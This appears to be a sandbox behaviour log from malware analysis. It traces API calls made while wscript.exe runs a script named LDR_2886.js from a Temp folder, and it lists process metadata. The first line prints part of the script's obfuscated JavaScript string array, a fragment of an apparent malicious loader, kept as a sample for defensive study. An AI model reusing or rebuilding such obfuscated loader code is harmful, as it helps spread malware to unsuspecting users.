	[0116.827] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0116.827] GetProcessHeap () returned 0x3f0000
	[0116.827] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x428430, Size=0x11238) returned 0x45ae20
	[0116.828] ??2@YAPEAX_K@Z () returned 0x3bf480
	[0116.828] GetCurrentThreadId () returned 0x8ec
	[0116.828] realloc (_Block=0x0, _Size=0xc8) returned 0x3bf4e0
	[0116.828] ??2@YAPEAX_K@Z () returned 0x3bf5b0
	[0116.828] malloc (_Size=0x1008) returned 0x3ba4f0
	[0116.828] ??2@YAPEAX_K@Z () returned 0x3bf5f0
	[0116.829] malloc (_Size=0x108) returned 0x3b7d80
	[0116.829] malloc (_Size=0x208) returned 0x3bf7a0
	[0116.829] malloc (_Size=0x200) returned 0x3bf9b0
	[0116.829] malloc (_Size=0x408) returned 0x3bfbc0
	[0116.829] malloc (_Size=0x2008) returned 0x3bb500
	[0116.829] malloc (_Size=0x808) returned 0x3bd510
	[0116.830] malloc (_Size=0x1008) returned 0x3bdd20
	[0116.831] malloc (_Size=0x4008) returned 0x26dfd0
	[0116.831] malloc (_Size=0x2008) returned 0x271fe0
	[0116.834] malloc (_Size=0x4008) returned 0x273ff0
	[0116.959] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0116.959] CObjectContext::Release () returned 0x1
	[0116.959] GetTickCount () returned 0x2da18
	[0116.960] ??2@YAPEAX_K@Z () returned 0x276560
	[0116.960] ??2@YAPEAX_K@Z () returned 0x276590
	[0116.961] ??2@YAPEAX_K@Z () returned 0x2765c0
	[0116.962] ??2@YAPEAX_K@Z () returned 0x2765f0
	[0116.962] ??2@YAPEAX_K@Z () returned 0x276620
	[0116.963] ??2@YAPEAX_K@Z () returned 0x276650
	[0116.963] ??2@YAPEAX_K@Z () returned 0x276680
	[0116.964] ??2@YAPEAX_K@Z () returned 0x2766b0
	[0116.964] ??2@YAPEAX_K@Z () returned 0x2766e0
	[0116.965] ??2@YAPEAX_K@Z () returned 0x276710
	[0116.965] ??2@YAPEAX_K@Z () returned 0x276740
	[0116.965] ??2@YAPEAX_K@Z () returned 0x276770
	[0116.966] ??2@YAPEAX_K@Z () returned 0x2767a0
	[0116.968] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0116.968] CObjectContext::Release () returned 0x1
	[0116.968] GetTickCount () returned 0x2da28
	[0116.968] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0116.969] CObjectContext::Release () returned 0x1
	[0116.969] GetTickCount () returned 0x2da28
	[0116.971] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0116.971] CObjectContext::Release () returned 0x1
	[0116.971] GetTickCount () returned 0x2da28
	[0116.972] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0116.972] CObjectContext::Release () returned 0x1
	[0116.972] GetTickCount () returned 0x2da28
	[0116.972] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0116.973] CObjectContext::Release () returned 0x1
	[0116.973] GetTickCount () returned 0x2da28
	[0116.976] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0116.976] CObjectContext::Release () returned 0x1
	[0116.976] GetTickCount () returned 0x2da37
	[0116.980] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0116.980] CObjectContext::Release () returned 0x1
	[0116.980] GetTickCount () returned 0x2da37
	[0116.980] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0116.980] CObjectContext::Release () returned 0x1
	[0116.980] GetTickCount () returned 0x2da37
	[0116.981] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0116.981] CObjectContext::Release () returned 0x1
	[0116.981] GetTickCount () returned 0x2da37
	[0116.983] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0116.983] CObjectContext::Release () returned 0x1
	[0116.983] GetTickCount () returned 0x2da37
	[0116.984] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0116.984] CObjectContext::Release () returned 0x1
	[0116.984] GetTickCount () returned 0x2da37
	[0116.985] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0116.985] CObjectContext::Release () returned 0x1
	[0116.985] GetTickCount () returned 0x2da37
	[0116.986] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0116.986] CObjectContext::Release () returned 0x1
	[0116.986] GetTickCount () returned 0x2da37
	[0116.987] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0116.987] CObjectContext::Release () returned 0x1
	[0116.987] GetTickCount () returned 0x2da37
	[0116.988] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0116.988] CObjectContext::Release () returned 0x1
	[0116.988] GetTickCount () returned 0x2da37
	[0116.989] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0116.989] CObjectContext::Release () returned 0x1
	[0116.989] GetTickCount () returned 0x2da37
	[0116.991] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0116.991] CObjectContext::Release () returned 0x1
	[0116.991] GetTickCount () returned 0x2da37
	[0116.991] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x1207f8
	[0117.045] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x121d44
	[0117.045] LockResource (hResData=0x121d44) returned 0x121d44
	[0117.045] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x15c
	[0117.045] FreeResource (hResData=0x121d44) returned 0
	[0117.045] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0117.045] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0117.045] LockResource (hResData=0x121c74) returned 0x121c74
	[0117.046] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0117.046] FreeResource (hResData=0x121c74) returned 0
	[0117.046] bsearch (_Key=0x25cb98, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0117.047] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0117.048] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0117.048] CObjectContext::Release () returned 0x1
	[0117.048] GetTickCount () returned 0x2da76
	[0117.050] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0117.050] CObjectContext::Release () returned 0x1
	[0117.050] GetTickCount () returned 0x2da76
	[0117.051] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0117.051] CObjectContext::Release () returned 0x1
	[0117.051] GetTickCount () returned 0x2da76
	[0117.052] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0117.052] CObjectContext::Release () returned 0x1
	[0117.052] GetTickCount () returned 0x2da76
	[0117.054] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0117.055] CObjectContext::Release () returned 0x1
	[0117.055] GetTickCount () returned 0x2da85
	[0117.056] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0117.056] CObjectContext::Release () returned 0x1
	[0117.056] GetTickCount () returned 0x2da85
	[0117.058] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0117.058] CObjectContext::Release () returned 0x1
	[0117.058] GetTickCount () returned 0x2da85
	[0117.060] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0117.060] CObjectContext::Release () returned 0x1
	[0117.060] GetTickCount () returned 0x2da85
	[0117.062] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0117.062] CObjectContext::Release () returned 0x1
	[0117.062] GetTickCount () returned 0x2da85
	[0117.066] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0117.066] CObjectContext::Release () returned 0x1
	[0117.066] GetTickCount () returned 0x2da85
	[0117.070] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0117.070] CObjectContext::Release () returned 0x1
	[0117.070] GetTickCount () returned 0x2da95
	[0117.074] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0117.074] CObjectContext::Release () returned 0x1
	[0117.074] GetTickCount () returned 0x2da95
	[0117.078] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0117.078] CObjectContext::Release () returned 0x1
	[0117.078] GetTickCount () returned 0x2da95
	[0117.080] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0117.080] CObjectContext::Release () returned 0x1
	[0117.080] GetTickCount () returned 0x2da95
	[0117.084] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0117.084] CObjectContext::Release () returned 0x1
	[0117.084] GetTickCount () returned 0x2da95
	[0117.093] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0117.093] CObjectContext::Release () returned 0x1
	[0117.094] GetTickCount () returned 0x2daa5
	[0117.097] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0117.097] CObjectContext::Release () returned 0x1
	[0117.097] GetTickCount () returned 0x2daa5
	[0117.101] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0117.102] CObjectContext::Release () returned 0x1
	[0117.102] GetTickCount () returned 0x2dab4
	[0117.107] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0117.107] CObjectContext::Release () returned 0x1
	[0117.107] GetTickCount () returned 0x2dab4
	[0117.111] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0117.111] CObjectContext::Release () returned 0x1
	[0117.111] GetTickCount () returned 0x2dab4
	[0117.115] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0117.115] CObjectContext::Release () returned 0x1
	[0117.115] GetTickCount () returned 0x2dab4
	[0117.123] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0117.123] CObjectContext::Release () returned 0x1
	[0117.123] GetTickCount () returned 0x2dac4
	[0117.138] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0117.138] CObjectContext::Release () returned 0x1
	[0117.138] GetTickCount () returned 0x2dad3
	[0117.141] _resetstkoflw () returned 0x1
	[0117.142] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0117.142] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0117.142] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0117.142] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0117.143] FreeResource (hResData=0x120b6c) returned 0
	[0117.143] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0117.143] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0117.143] LockResource (hResData=0x121c74) returned 0x121c74
	[0117.143] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0117.144] FreeResource (hResData=0x121c74) returned 0
	[0117.144] bsearch (_Key=0x172d58, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0117.144] ??2@YAPEAX_K@Z () returned 0x2f86b0
	[0117.761] CreateErrorInfo (in: pperrinfo=0x25ba30 | out: pperrinfo=0x25ba30*=0x43a718) returned 0x0
	[0117.763] CErrorObject::SetGUID () returned 0x0
	[0117.763] CErrorObject::SetSource () returned 0x0
	[0117.763] LoadStringW (in: hInstance=0x7fee1590000, uID=0x1004, lpBuffer=0x25a170, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0117.763] FormatMessageW (in: dwFlags=0x500, lpSource=0x43e558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x25ba40, nSize=0x0, Arguments=0x25bab0 | out: lpBuffer="\xd380\x48") returned 0x31
	[0117.763] CErrorObject::SetDescription () returned 0x0
	[0117.763] CErrorObject::SetHelpFile () returned 0x0
	[0117.763] CErrorObject::SetHelpContext () returned 0x0
	[0117.763] QueryInterface () returned 0x0
	[0117.764] SetErrorInfo (dwReserved=0x0, perrinfo=0x43a710) returned 0x0
	[0117.764] Release () returned 0x2
	[0117.764] IUnknown:Release (This=0x43a710) returned 0x1
	[0117.764] LocalFree (hMem=0x48d380) returned 0x0
	[0117.764] IUnknown:Release (This=0x48c0f0) returned 0x1
	[0117.764] GetTickCount () returned 0x2dd44
	[0117.764] bsearch (_Key=0x25cb98, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a3e0
	[0117.764] ??2@YAPEAX_K@Z () returned 0x332050
	[0117.766] SetItemAlloc () returned 0x0
	[0117.766] Release () returned 0x1
	[0117.766] QueryInterface () returned 0x80004002
	[0117.766] QueryInterface () returned 0x80004002
	[0117.766] QueryInterface () returned 0x80004002
	[0117.766] QueryInterface () returned 0x80004002
	[0117.766] QueryInterface () returned 0x0
	[0117.766] Release () returned 0x1
	[0117.766] realloc (_Block=0x2b2b40, _Size=0x140) returned 0x274f90
	[0117.768] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0117.768] CObjectContext::Release () returned 0x1
	[0117.768] GetTickCount () returned 0x2dd44
	[0117.771] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0117.771] CObjectContext::Release () returned 0x1
	[0117.771] GetTickCount () returned 0x2dd44
	[0117.773] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0117.774] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0117.774] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0117.774] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0117.774] FreeResource (hResData=0x120b6c) returned 0
	[0117.775] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0117.775] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0117.775] LockResource (hResData=0x121c74) returned 0x121c74
	[0117.775] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0117.776] FreeResource (hResData=0x121c74) returned 0
	[0117.776] bsearch (_Key=0x172d58, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0119.538] SendMessageA (hWnd=0x6025a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0119.540] SendMessageA (hWnd=0x6025a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0119.540] PostMessageA (hWnd=0x6025a, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0119.542] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25f3d0*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0119.542] CloseHandle (hObject=0xd4) returned 1
	[0119.542] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.542] IUnknown:Release (This=0x41e5f0) returned 0x0
	[0119.542] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.542] IUnknown:Release (This=0x41e6a0) returned 0x0
	[0119.542] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.542] IUnknown:Release (This=0x41e750) returned 0x0
	[0119.542] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.542] IUnknown:Release (This=0x41e540) returned 0x0
	[0119.543] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.543] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.543] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.543] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.543] GetProcessHeap () returned 0x3f0000
	[0119.543] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45ae20 | out: hHeap=0x3f0000) returned 1
	[0119.544] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.544] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x25f400 | out: lplpMessageFilter=0x25f400*=0x3b5f80) returned 0x0
	[0119.544] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.544] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.544] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0119.544] CoUninitialize () 
	[0119.544] DllCanUnloadNow () returned 0x0
	[0119.544] DllCanUnloadNow () 

Thread:
	id = 291
	os_tid = 0x110


Thread:
	id = 292
	os_tid = 0x764

	[0115.926] GetClassInfoA (in: hInstance=0xffa90000, lpClassName="WSH-Timer", lpWndClass=0x21dfce0 | out: lpWndClass=0x21dfce0) returned 0
	[0115.926] RegisterClassA (lpWndClass=0x21dfce0) returned 0x9006ac138
	[0115.926] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xffa90000, lpParam=0x3b5a60) returned 0x6025a
	[0115.927] GetWindowLongPtrA (hWnd=0x6025a, nIndex=-21) returned 0x0
	[0115.927] NtdllDefWindowProc_A (hWnd=0x6025a, Msg=0x24, wParam=0x0, lParam=0x21df6d0) returned 0x0
	[0115.927] GetWindowLongPtrA (hWnd=0x6025a, nIndex=-21) returned 0x0
	[0115.927] SetWindowLongPtrA (hWnd=0x6025a, nIndex=-21, dwNewLong=0x3b5a60) returned 0x0
	[0115.927] NtdllDefWindowProc_A (hWnd=0x6025a, Msg=0x81, wParam=0x0, lParam=0x21df690) returned 0x1
	[0115.929] GetWindowLongPtrA (hWnd=0x6025a, nIndex=-21) returned 0x3b5a60
	[0115.929] NtdllDefWindowProc_A (hWnd=0x6025a, Msg=0x83, wParam=0x0, lParam=0x21df6f0) returned 0x0
	[0115.931] GetWindowLongPtrA (hWnd=0x6025a, nIndex=-21) returned 0x3b5a60
	[0115.931] NtdllDefWindowProc_A (hWnd=0x6025a, Msg=0x1, wParam=0x0, lParam=0x21df690) returned 0x0
	[0115.931] SetEvent (hEvent=0xcc) returned 1
	[0116.026] GetMessageA (in: lpMsg=0x21dfcb0, hWnd=0x6025a, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x21dfcb0) returned 0
	[0119.539] GetWindowLongPtrA (hWnd=0x6025a, nIndex=-21) returned 0x3b5a60
	[0119.540] GetWindowLongPtrA (hWnd=0x6025a, nIndex=-21) returned 0x3b5a60

Thread:
	id = 293
	os_tid = 0xbe4


Thread:
	id = 294
	os_tid = 0x858


Thread:
	id = 295
	os_tid = 0x364


Thread:
	id = 296
	os_tid = 0x884


Thread:
	id = 297
	os_tid = 0xb84


Thread:
	id = 301
	os_tid = 0xacc


Thread:
	id = 311
	os_tid = 0xacc


Process:
	id = "36"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x2f797000"
	os_pid = "0x71c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 299
	os_tid = 0x6d8

	[0118.028] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fb20 | out: lpSystemTimeAsFileTime=0x17fb20*(dwLowDateTime=0xbe98ea40, dwHighDateTime=0x1d543d1)) 
	[0118.028] GetCurrentProcessId () returned 0x71c
	[0118.028] GetCurrentThreadId () returned 0x6d8
	[0118.028] GetTickCount () returned 0x2de4d
